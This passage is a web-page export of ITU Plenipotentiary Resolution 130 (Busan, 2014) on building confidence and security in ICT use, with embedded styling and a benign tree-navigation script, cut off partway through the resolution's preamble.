{"id":1721,"date":"2015-06-30T15:04:35","date_gmt":"2015-06-30T19:04:35","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=1721"},"modified":"2015-06-30T15:04:35","modified_gmt":"2015-06-30T19:04:35","slug":"pp-2014_130","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/plenipotentiary\/pp-2014\/pp-2014_130\/","title":{"rendered":"PP Resolution 130"},"content":{"rendered":"<p><style type=\"text\/css\">\nbody {}\n\n:link { color: #0000ff; text-decoration:none;}\n:visited { color: #6666ff; text-decoration:none; }\na:active { color: #0000ff; text-decoration:none;}\na:hover {color: #0000ff; text-decoration:underline; }\n\ndiv.basetext {}\n\ndiv.basetop {}\n\nh1 {\n    text-align:center;\n}\n\nspan.h2 {}\n\ndiv.year {}\n\ndiv.form {}\n\nspan.cpt {}\n\nspan.cm {}\n\n.fl {}\n\nul {}\n\nli {}\n\nul li {\n\tlist-style:square;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n\nli.basic {\n\tlist-style:square;\n\tlist-style-image:none;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\nspan.links {\n}\n\n\n\n\n.sub { display: none; }\n.subexp {display: block; }\n.sub { display: none; } \n\n.subexp {display: block; } \n\nli.exp {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.col {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.exp_active {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;  \n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer;\n}\n\nli.col_active {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer; \/* if not included, bullets are not shown right in moz*\/\n}\n\n\nli.basic_active {\n  list-style:square;\n  list-style-image:none;\n  background-color:#eeeeff;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\n\/* the 'boxed' and 'attributes' styles are used to display notes and attributes\n*\/\n\n.boxed,.nodecontent {display:inline;}\n.boxed .note-and-attributes {display:none;}\n\n.boxed:hover .note-and-attributes {\n\tposition:fixed; top:2em;right:10px;z-index:3;\n\tdisplay:block;\n\tmin-width:33%;\n\tmax-width:60%;\n\tmax-height:95%;\n\tcolor:black;\n\tbackground:#ffffff;\n\tfont:normal 16px courier, sans-serif;\n\tborder:1px solid black;\n\tpadding:10px;\n}\n\n.note:before {\n\tcontent:\"NOTE: \";\n\tfont-weight:bold;\n}\n\ntable.attributes {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable.attributes td,th {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\ntable.attributes th {\n\ttext-align:center;\n}\ntable.attributes caption {\n\tmargin-top:1em;\n\tfont-style:italic;\n\ttext-align:center;\n}\n\/* Thanks to wolfgangradke, https:\/\/sourceforge.net\/forum\/message.php?msg_id=5991663 *\/\ndiv.nodecontent > p {\n\tmargin-top:0pt;\n\tmargin-bottom:0pt;\n\tdisplay:inline;\n}\n\np + p { \n \tmargin-top: 0.5em !important;\n\tdisplay:block !important;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747128&group_id=7118*\/\ntable {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable td {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747000&group_id=7118*\/\nol {\n\tmargin-top:1px;\n    margin-bottom:1px;\n\tmargin-left:0px;\n\tpadding-left:3%;\n}\n\nol li {\n\tlist-style:decimal;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n<\/style><br \/>\n<script type=\"text\/javascript\">\r\n\/* MarkTree JavaScript code\r\n * \r\n * Distributed under the terms of the MIT License.\r\n * See \"LICENCE.MIT\" or http:\/\/www.opensource.org\/licenses\/mit-license.php for details.\r\n *\r\n * Software distributed under the License is distributed on an \"AS IS\" basis,\r\n * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License\r\n * for the specific language governing rights and limitations under the\r\n * License.\r\n * \r\n * Miika Nurminen, 12.7.2004.\r\n *\/\r\n\r\n\/* cross-browser (tested with ie5, mozilla 1 and opera 5) keypress detection *\/\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u2030vi\u2030 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/script><\/p>\n<h3><span style=\"\">PP RESOLUTION 130 (Rev. Busan, 2014)<\/span><\/h3>\n<h4><span style=\"\">Strengthening the role of ITU in building confidence and security in the use of information and communication technologies<\/span><\/h4>\n<p><span style=\"\">The Plenipotentiary Conference of the International Telecommunication Union ( Busan, 2014),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\">\n<div class=\"nodecontent\">recalling<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        United Nations General Assembly (UNGA) Resolution 68\/198, on information and communication technologies (ICTs) for development;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        UNGA Resolution 68\/167, on the right to privacy in the digital age;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        UNGA Resolution 68\/243, on developments in the field of information and telecommunications in the context of international security;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d)         UNGA Resolution 57\/239, on the creation of a global culture of cybersecurity;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e)        the outcome documents of the WSIS+10 High-Level Event, containing the WSIS+10 Statement on the Implementation of WSIS Outcomes and the WSIS+10 Vision for WSIS Beyond 2015;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">f)        Resolution 174 (Rev. Busan, 2014) of this conference;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">g)        Resolution 181 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">h)        Resolution 45 (Rev. Dubai, 2014) of the World Telecommunication Development Conference (WTDC), on mechanisms for enhancing cooperation on cybersecurity, including countering and combating spam;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">i)        Resolution 140 (Rev. Busan, 2014) of this conference;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">j)        Resolution 69 (Rev. Dubai, 2014) of WTDC, on the creation of national computer incident response teams (CIRTs), particularly for developing countries1, and cooperation between them;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">k)        that ITU Council Resolution 1305, adopted at its 2009 session, identified the security, safety, continuity, sustainability and robustness of the Internet as public policy issues that fall within the scope of ITU,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">considering<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        that the ITU-coordinated WSIS+10 High-Level Event reaffirmed the importance of building confidence and security in the use of ICTs, as mentioned in relevant paragraphs of the WSIS+10 outcome documents (Geneva, 2014);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        the crucial importance of information and communication infrastructures and their applications to practically all forms of social and economic activity;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        that, with the application and development of ICTs, new threats from various sources have emerged, that have had an impact on confidence and security in the use of ICTs by all Member States, Sector Members and other stakeholders, including all users of ICTs, and on the preservation of peace and the economic and social development of all Member States, and that threats to and vulnerabilities of networks continue to give rise to ever-growing security challenges across national borders for all countries, in particular developing countries, including the least developed countries, small island developing states, landlocked developing countries and countries with economies in transition, while noting in this context the strengthening of ITU&#8217;s role in building confidence and security in the use of ICTs and the need to further enhance international cooperation and develop appropriate existing national, regional and international mechanisms (for example, agreements, best practices, memorandums of understanding, etc.);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d)        that the ITU Secretary-General has been invited to support the International Multilateral Partnership Against Cyber-Threats (IMPACT), the Forum for Incident Response and Security Teams (FIRST) and other global or regional cybersecurity projects, as appropriate, and all countries, particularly developing countries, have been invited to take part in their activities;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e)        the ITU Global Cybersecurity Agenda (GCA), which encourages international cooperation aimed at proposing strategies for solutions to enhance confidence and security in the use of telecommunications\/ICTs;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">f)        that, in order to protect these infrastructures and address these challenges and threats, coordinated national, regional and international action is required for prevention, preparation, response and recovery from computer security incidents, on the part of government authorities, at the national (including the creation of national computer incident response teams (CIRTs)), and sub-national levels, the private sector and citizens and users, in addition to international and regional cooperation and coordination, and that ITU has a lead role to play within its mandate and competencies in this field;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">g)        the need for continual evolution in new technologies to support the early detection of, and coordinated and timely response to, events or incidents compromising computer security, or computer network security incidents that could compromise the availability, integrity and confidentiality of critical infrastructures in ITU Member States, and for strategies that will minimize the impact of such incidents and mitigate the growing risks and threats to which such platforms are exposed;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">h)        that the number of cyberthreats and cyberattacks is growing, as is dependence on the Internet and other networks that are essential for accessing services and information;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">i)        that the ITU Telecommunication Standardization Sector (ITU\u2011T) has adopted around 300 standards relating to building confidence and security in the use of information and communication technologies;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">j)        the final report on Question 22\u20111\/1 (Securing information and communication networks: Best practices for developing a culture of cybersecurity) of the ITU Telecommunication Development Sector (ITU\u2011D),<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">recognizing<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        that the development of ICTs has been and continues to be instrumental for the growth and development of the global economy, underpinned by security and trust;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        that the World Summit on the Information Society (WSIS) affirmed the importance of building confidence and security in the use of ICTs and the great importance of multistakeholder implementation at the international level, and established Action Line C5 (Building confidence and security in the use of ICTs), with ITU identified in the Tunis Agenda for the Information Society as moderator\/facilitator for the action line, and that this task has been carried out by the Union in recent years, for example under GCA;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        that WTDC\u201114 has adopted the Dubai Action Plan and its Objective 3, in particular Output 3.1, on building confidence and security in the use of ICTs, which identifies cybersecurity as a priority activity of the Telecommunication Development Bureau (BDT) and defines the main areas of work to be undertaken by BDT; and has also adopted Resolution 45 (Rev. Dubai, 2014), on mechanisms for enhancing cooperation on cybersecurity, including countering and combating spam, calling on the Secretary-General to bring the resolution to the attention of the next plenipotentiary conference for consideration and required action, and to report the results of these main areas of work to the Council and to the Plenipotentiary Conference in 2018, as appropriate; and Resolution 69 (Rev. Dubai, 2014), on the creation of national CIRTs, particularly for developing countries, and cooperation among them;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d)        that, to support the creation of national CIRTs in Member States where these are needed and are currently absent, the World Telecommunication Standardization Assembly (WTSA) adopted Resolution 58 (Rev. Dubai, 2012), on encouraging the creation of national CIRTs, particularly for developing countries; and WTDC-14 adopted Resolution 69 (Rev. Dubai, 2014), on the creation of national CIRTs, including CIRTs responsible for government-to-government cooperation, particularly for developing countries, cooperation among them, and the importance of coordination among all relevant organizations;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e)        \u00a7 15 of the Tunis Commitment, which states: &#8220;Recognizing the principles of universal and non-discriminatory access to ICTs for all nations, the need to take into account the level of social and economic development of each country, and respecting the development-oriented aspects of the information society, we underscore that ICTs are effective tools to promote peace, security and stability, to enhance democracy, social cohesion, good governance and the rule of law, at national, regional and international levels. ICTs can be used to promote economic growth and enterprise development. Infrastructure development, human capacity building, information security and network security are critical to achieve these goals. We further recognize the need to effectively confront challenges and threats resulting from use of ICTs for purposes that are inconsistent with objectives of maintaining international stability and security and may adversely affect the integrity of the infrastructure within States, to the detriment of their security. It is necessary to prevent the abuse of information resources and technologies for criminal and terrorist purposes, while respecting human rights&#8221;, and that the challenges created by this misuse of ICT resources have only continued to increase since WSIS;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">f)         that the ITU-coordinated WSIS+10 High-Level Event identified several challenges in the implementation of the WSIS action lines that still remain and that will need to be addressed beyond 2015;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">g)         that Member States, in particular developing countries, in the elaboration of appropriate and workable legal measures relating to protection against cyberthreats at the national, regional and international levels, may require assistance from ITU in establishing technical and procedural measures, aimed at securing national ICT infrastructures, on request from these Member States, while noting that there are a number of regional and international initiatives which may support these countries in elaborating such legal measures;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">h)         Opinion 4 (Lisbon, 2009) of the World Telecommunication Policy Forum, on collaborative strategies for creating confidence and security in the use of ICTs;<\/div>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">i)        the relevant outcomes of WTSA-12, notably:<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">i)        Resolution 50 (Rev. Dubai, 2012), on cybersecurity;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">ii)        Resolution 52 (Rev. Dubai, 2012), on countering and combating spam,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">aware<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        that ITU and other international organizations, through a variety of activities, are examining issues related to building confidence and security in the use of ICTs, including stability and measures to combat spam, malware, etc., and to protect personal data and privacy;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        that ITU\u2011T Study Group 17, Study Groups 1 and 2 of the Telecommunication Development Sector (ITU\u2011D) and other relevant ITU study groups continue to work on technical means for the security of information and communication networks, in accordance with Resolutions 50 and 52 (Rev. Dubai, 2012) and Resolutions 45 and 69 (Rev. Dubai, 2014);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        that ITU has a fundamental role to play in building confidence and security in the use of ICTs;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d)        that ITU\u2011D Study Group 2 continues to carry out the studies called for in ITU\u2011D Question 3\/2 (Securing information and communications networks: best practices for developing a culture of cybersecurity), which has been reflected in United Nations General Assembly Resolution 64\/211;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e)        that ITU is also assisting developing countries in building confidence and security in the use of ICTs and supporting the establishment of CIRTs, including CIRTs responsible for government-to-government cooperation, and the importance of coordination among all relevant organizations;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">f)        that Council Resolution 1336, adopted at its 2011 session, established a working group of the Council on international Internet-related public policy issues (CWG-Internet), whose terms of reference are to identify, study and develop matters related to international Internet-related public policy issues, including those issues identified in Council Resolution 1305 (2009) such as security safety, continuity, sustainability and robustness of the Internet;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">g)         that WTDC\u201114 adopted Resolution 80 (Dubai, 2014), on establishing and promoting trusted information frameworks in developing countries to facilitate and encourage electronic information exchanges between economic partners;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">h)        of Article 6, on security and robustness of networks, and Article 7, on unsolicited bulk electronic communications, of the International Telecommunication Regulations adopted by the World Conference on International Telecommunications (Dubai, 2012),<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">noting<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        that, as an intergovernmental organization with private\u2011sector participation, ITU is well-positioned to play an important role, together with other relevant international bodies and organizations, in addressing threats and vulnerabilities, which affect efforts to build confidence and security in the use of ICTs;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        \u00a7\u00a7 35 and 36 of the Geneva Declaration of Principles and \u00a7 39 of the Tunis Agenda, on building confidence and security in the use of ICTs;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        that although there are no universally agreed upon definitions of spam and other terms in this sphere, spam was characterized by ITU\u2011T Study Group 2, at its June 2006 session, as a term commonly used to describe unsolicited electronic bulk communications over e\u2011mail or mobile messaging (SMS, MMS), usually with the objective of marketing commercial products or services;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d)        the Union&#8217;s initiative concerning IMPACT and FIRST,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">bearing in mind<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">the work of the ITU established by Resolutions 50, 52 and 58 (Rev. 